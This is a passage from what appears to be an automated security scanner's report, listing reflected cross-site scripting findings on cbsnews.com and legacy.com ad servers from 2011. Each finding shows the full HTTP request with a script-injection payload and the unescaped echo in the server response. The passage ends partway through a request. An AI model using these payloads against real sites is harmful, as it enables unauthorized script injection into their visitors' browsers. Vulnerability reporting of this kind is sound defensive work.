GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162dc004<a>c7e5ad6dad5&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:24 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:36:24 GMT
Content-Length: 552

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162dc004<a>c7e5ad6dad5&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BRAND=&
...[SNIP]...

1.212. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 4e95f*/alert(1)//b34259e989e was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=14e95f*/alert(1)//b34259e989e&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:54 GMT
Server: Apache/2.2
Content-Length: 1088
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:54 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=14e95f*/alert(1)//b34259e989e&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.213. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 4d5b0*/alert(1)//4aaf1da79cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1&4d5b0*/alert(1)//4aaf1da79cd=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:12 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:12 GMT
Content-Length: 610

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1&4d5b0*/alert(1)//4aaf1da79cd=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1||;cbsnews.com;;|-1';/* MAC [r20101
...[SNIP]...

1.214. http://mads.cbsnews.com/mac-ad [x-cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 7ae8b*/alert(1)//a2655b7e480 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=915017457ae8b*/alert(1)//a2655b7e480&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:05 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:05 GMT
Content-Length: 608

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=915017457ae8b*/alert(1)//a2655b7e480&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1||;cbsnews
...[SNIP]...

1.215. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd83b"><script>alert(1)</script>a6532cd236c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframefd83b"><script>alert(1)</script>a6532cd236c/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addynfd83b"><script>alert(1)</script>a6532cd236c/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.216. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7704"><script>alert(1)</script>52919f7acc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e7704"><script>alert(1)</script>52919f7acc/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0e7704"><script>alert(1)</script>52919f7acc/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.217. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b13"><script>alert(1)</script>96e07070135 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1a6b13"><script>alert(1)</script>96e07070135/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1a6b13"><script>alert(1)</script>96e07070135/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.218. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 228ac"><script>alert(1)</script>727f9da3634 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112228ac"><script>alert(1)</script>727f9da3634/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112228ac"><script>alert(1)</script>727f9da3634/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.219. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9f27"><script>alert(1)</script>1f3976d245b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0f9f27"><script>alert(1)</script>1f3976d245b/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0f9f27"><script>alert(1)</script>1f3976d245b/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.220. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8efe9"><script>alert(1)</script>c6708a262a1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-18efe9"><script>alert(1)</script>c6708a262a1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-18efe9"><script>alert(1)</script>c6708a262a1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.221. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6054d"><script>alert(1)</script>db683bfce34 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size6054d"><script>alert(1)</script>db683bfce34=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size6054d"><script>alert(1)</script>db683bfce34=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.222. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3425e"><script>alert(1)</script>0d0a6d3f675 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=1772836903425e"><script>alert(1)</script>0d0a6d3f675 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=1772836903425e"><script>alert(1)</script>0d0a6d3f675;adiframe=y">
...[SNIP]...

1.223. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7047e"><script>alert(1)</script>84b7f80ebaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690&7047e"><script>alert(1)</script>84b7f80ebaa=1 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 327

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690&7047e"><script>alert(1)</script>84b7f80ebaa=1;adiframe=y">
...[SNIP]...

1.224. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e633"><script>alert(1)</script>acb95e1ea6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe5e633"><script>alert(1)</script>acb95e1ea6/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 322

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn5e633"><script>alert(1)</script>acb95e1ea6/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.225. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e8a5"><script>alert(1)</script>8134445c0f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.06e8a5"><script>alert(1)</script>8134445c0f1/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
